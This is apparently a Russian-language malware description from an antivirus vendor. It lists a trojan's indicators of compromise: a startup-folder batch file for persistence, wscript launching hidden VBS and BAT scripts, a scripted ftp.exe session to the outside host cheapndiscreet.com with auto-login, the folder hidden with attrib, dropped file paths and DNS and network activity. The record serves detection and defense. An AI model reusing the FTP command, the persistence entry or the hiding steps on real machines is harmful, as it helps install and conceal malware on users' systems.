Техническая информация
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\windows.bat (общая папка автозагрузки: файл выполняется при входе в систему любого пользователя)
- <SYSTEM32>\wscript.exe C:\hidden2\hid.vbs C:\hidden2\go.bat
- <SYSTEM32>\cmd.exe /c ""C:\hidden2\go.bat" "
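- <SYSTEM32>\ftp.exe -i -n -s:C:\hidden2\a.src cheapndiscreet.com (FTP-сеанс по сценарию: команды читаются из файла a.src, автоматический вход и запросы подтверждения отключены)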
- <SYSTEM32>\attrib.exe +H C:\hidden2 (каталогу присваивается атрибут «скрытый»)
- <SYSTEM32>\wscript.exe C:\hidden2\hid.vbs C:\hidden2\x.bat
- <SYSTEM32>\cmd.exe /c ""C:\hidden2\x.bat" "
- C:\hidden2\hid.vbs
- C:\hidden2\x.bat
- C:\hidden2\go.bat
- C:\hidden2\<Имя вируса>.exe
- C:\hidden2\a.src
- 'localhost':1037
- 'ch####discreet.com':21 (порт 21 — FTP; по-видимому, то же соединение, которое открывает ftp.exe)
- DNS ASK ch####discreet.com